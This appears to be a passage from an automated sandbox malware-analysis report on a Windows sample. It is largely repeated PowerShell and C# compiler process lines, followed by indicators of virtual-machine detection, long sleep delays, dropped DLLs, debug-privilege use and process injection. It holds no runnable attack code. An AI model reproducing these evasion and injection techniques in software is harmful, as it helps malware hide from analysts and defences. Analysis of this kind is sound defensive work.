Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\mshta.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4233
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4761

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1352	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4984	Thread sleep count: 4233 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4640	Thread sleep count: 4761 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268	Thread sleep time: -11990383647911201s >= -30000s

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_009C888D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_009BE0BA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_009D4FE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_00CA888D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_00C9E0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_00CB4FE1

Source: C:\Windows\System32\loaddll32.exe

0_2_009C05EF

Source: mshta.exe, 0000001B.00000003.556464043.000001BAE991B000.00000004.00000001.sdmp

Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s5_u

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009B5BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_009B5BD5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		0_2_009D16A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		1_2_00CB16A5

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Show sources

